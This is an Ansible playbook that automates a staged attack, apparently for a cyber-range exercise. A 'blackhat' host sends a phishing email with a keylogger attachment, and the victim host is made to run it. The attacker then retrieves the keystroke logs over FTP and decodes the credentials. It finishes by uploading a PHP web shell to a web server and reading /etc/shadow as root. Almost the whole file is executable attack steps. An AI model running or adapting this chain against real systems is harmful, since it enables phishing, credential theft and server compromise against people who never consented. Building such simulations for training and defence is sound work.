---
#
# Stage I: Initial compromise (phishing inject)
#     1. Send phishing email
#     2. Download malicious software
#     3. Obtain contractor's account username and password
#     4. Login to Bullseye webserver as contractor
#     5. Upload shell file to implement command injection 
#     6. Run system command as root on web server
#

- name: phishing inject
  hosts: blackhat
  tasks:
    - name: send a phishing email
      raw: echo "Are you frustrated with how slow your computer is? Open the attachment for a free virus scan!" | mutt -s "Free virus scan!" -a keylogger.py -- contractor@fazio.com
    - name: upload xor encryption script
      raw: python package.py xor.py
- name: phishing response
  hosts: contractor
  tasks:
    - name: download the email
      raw: fetchmail
    - name: isolate the email in home directory
      raw: grep -lir "keylogger" /home/ubuntu/mail/new | xargs -I {} mv {} /home/ubuntu
    - name: unpack the attachment
      raw: grep -lir "keylogger" /home/ubuntu | xargs munpack
    - name: run the keylogger
      raw: python keylogger.py
- name: recover captured credentials
  hosts: blackhat
  tasks:
    - name: download log file from ftp
      raw: wget --user=anonymous --password='contractor@fazio.com' ftp://ftp.fazio.com:21/upload/logs.txt
    - name: decode keylogger file
      raw: python decoder.py
- name: implement shell injection to webserver
  hosts: blackhat
  tasks:
    - name: log in web server using decoded username and password, inject web with shell file
      raw: php shellinject.php logs_decoded.txt 10.0.0.16/ shell.php

    - name: run shell as root on web and get credentials
      raw: php shell.php logs_decoded.txt 10.0.0.16/ shell.php 'sudo cat /etc/shadow'
      register: out
    - debug: var=out.stdout_lines